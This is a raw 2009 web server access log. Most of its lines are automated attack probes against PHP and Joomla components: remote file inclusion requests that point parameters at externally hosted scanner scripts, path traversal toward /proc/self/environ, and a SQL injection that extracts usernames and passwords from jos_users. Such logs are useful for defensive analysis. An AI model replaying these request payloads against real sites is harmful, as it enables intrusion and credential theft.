74.6.8.112 - - [06/Jun/2009:02:04:36 -0400] "GET /logs/error_log.Q109052900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Jun/2009:02:04:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.73.161.62 - - [06/Jun/2009:02:05:02 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:02:05:03 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:02:05:03 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:02:05:11 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:02:05:35 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/rfiscan/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jun/2009:02:05:36 -0400] "GET /index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:02:05:36 -0400] "GET /logs/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:02:05:36 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.55.227.145 - - [06/Jun/2009:02:06:39 -0400] "GET /logs/error_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/superscan/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
217.73.161.62 - - [06/Jun/2009:02:07:03 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:04 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:04 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:07:20 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:07:21 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:25 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:28 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:28 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:07:45 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
199.120.90.222 - - [06/Jun/2009:02:07:45 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:46 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:07:55 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:02:07:56 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.193.208.71 - - [06/Jun/2009:02:07:57 -0400] "GET /logs/error_log.Q109010200//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.193.208.71 - - [06/Jun/2009:02:07:57 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
62.193.208.71 - - [06/Jun/2009:02:07:57 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
62.193.208.71 - - [06/Jun/2009:02:08:24 -0400] "GET /logs/error_log.Q108121000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
68.106.201.96 - - [06/Jun/2009:02:08:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
68.106.201.96 - - [06/Jun/2009:02:08:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
68.106.201.96 - - [06/Jun/2009:02:08:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
68.106.201.96 - - [06/Jun/2009:02:08:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
77.221.130.2 - - [06/Jun/2009:02:09:03 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:02:09:03 -0400] "GET /logs/access_log.Q109050700/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:02:09:03 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 238 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /logs/access_log.Q109050700/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 260 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /logs/access_log.Q109050700/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 260 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:02:09:04 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
209.59.12.99 - - [06/Jun/2009:02:09:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.2 - - [06/Jun/2009:02:10:02 -0400] "GET /logs/access_log.Q109052400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.2 - - [06/Jun/2009:02:10:02 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.2 - - [06/Jun/2009:02:10:02 -0400] "GET /logs/access_log.Q109052400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 260 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:02:10:02 -0400] "GET /logs/access_log.Q109052400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 260 "-" "XXXXXX"
116.36.213.166 - - [06/Jun/2009:02:10:44 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
217.73.161.62 - - [06/Jun/2009:02:10:50 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:11:12 -0400] "GET /logs/access_log.Q109051800%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:11:13 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:02:11:15 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:02:11:15 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:02:11:18 -0400] "GET /logs/access_log.Q109052100%20%20//bemarket/postscript/postscript.php?p_mode=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.55.227.145 - - [06/Jun/2009:02:11:27 -0400] "GET /logs/error_log.Q108100300//admin/classes/TplLoad.php?full_path_to_public_program=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
201.232.54.48 - - [06/Jun/2009:02:11:50 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:02:11:50 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:02:12:07 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:02:12:07 -0400] "GET /logs/access_log.Q109052700%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:02:12:16 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
203.151.233.106 - - [06/Jun/2009:02:12:22 -0400] "GET /logs/access_log.Q109051600/?GALLERY_BASEDIR=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:12:31 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:12:31 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:12:37 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:12:37 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
203.151.233.106 - - [06/Jun/2009:02:12:49 -0400] "GET /logs/access_log.Q109051100/?GALLERY_BASEDIR=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:13:05 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:13:26 -0400] "GET /logs/access_log.Q109052900/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
66.249.71.14 - - [06/Jun/2009:02:14:06 -0400] "GET /logs/access_log.Q109020100 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [06/Jun/2009:02:14:07 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
218.55.227.145 - - [06/Jun/2009:02:14:10 -0400] "GET /logs/error_log.Q109010200//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.55.227.145 - - [06/Jun/2009:02:14:10 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
218.55.227.145 - - [06/Jun/2009:02:14:11 -0400] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jun/2009:02:14:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.164.212.18 - - [06/Jun/2009:02:16:42 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
76.164.212.18 - - [06/Jun/2009:02:16:42 -0400] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
76.164.212.18 - - [06/Jun/2009:02:16:42 -0400] "GET /logs/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:16:52 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
218.55.227.145 - - [06/Jun/2009:02:17:01 -0400] "GET /logs/access_log.Q109010700//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
76.164.212.18 - - [06/Jun/2009:02:17:06 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:17:15 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:02:19:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [06/Jun/2009:02:19:49 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:02:19:52 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:17 -0400] "GET /logs/?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:17 -0400] "GET /logs/access_log.Q109053100/?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:17 -0400] "GET /?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:19 -0400] "GET /?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:19 -0400] "GET /logs/?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:19 -0400] "GET /logs/access_log.Q109053100%20%20/?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:25 -0400] "GET /logs/access_log.Q109053100/?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.15.161.2 - - [06/Jun/2009:02:20:29 -0400] "GET /logs/access_log.Q109053100%20%20/?submit=submit&form_include_template=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [06/Jun/2009:02:21:02 -0400] "GET /logs/error_log.Q109051600//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
117.110.57.130 - - [06/Jun/2009:02:21:14 -0400] "GET /logs/access_log.Q109050300////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:02:21:14 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 4373 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:02:21:16 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:02:21:16 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:02:21:53 -0400] "GET /logs/access_log.Q109051600////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:02:22:52 -0400] "GET /logs/access_log.Q109052200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
38.99.13.118 - - [06/Jun/2009:02:23:04 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.44.103 - - [06/Jun/2009:02:23:10 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [06/Jun/2009:02:25:00 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:25:56 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:25:56 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:25:56 -0400] "GET /logs/access_log.Q109052900/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:02:25:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [06/Jun/2009:02:26:07 -0400] "GET /logs/error_log.Q107110600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
90.185.249.111 - - [06/Jun/2009:02:26:12 -0400] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:26:12 -0400] "GET /logs/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:26:13 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:26:15 -0400] "GET /logs/access_log.Q109050300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:02:26:17 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:02:27:17 -0400] "GET /?submit=submit&form_include_template=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:02:27:17 -0400] "GET /logs/?submit=submit&form_include_template=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:02:27:18 -0400] "GET /logs/access_log.Q109053100%20%20/?submit=submit&form_include_template=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:02:27:20 -0400] "GET /?submit=submit&form_include_template=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jun/2009:02:27:20 -0400] "GET /logs/access_log.Q109053100%20%20/?submit=submit&form_include_template=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
76.164.212.18 - - [06/Jun/2009:02:27:21 -0400] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
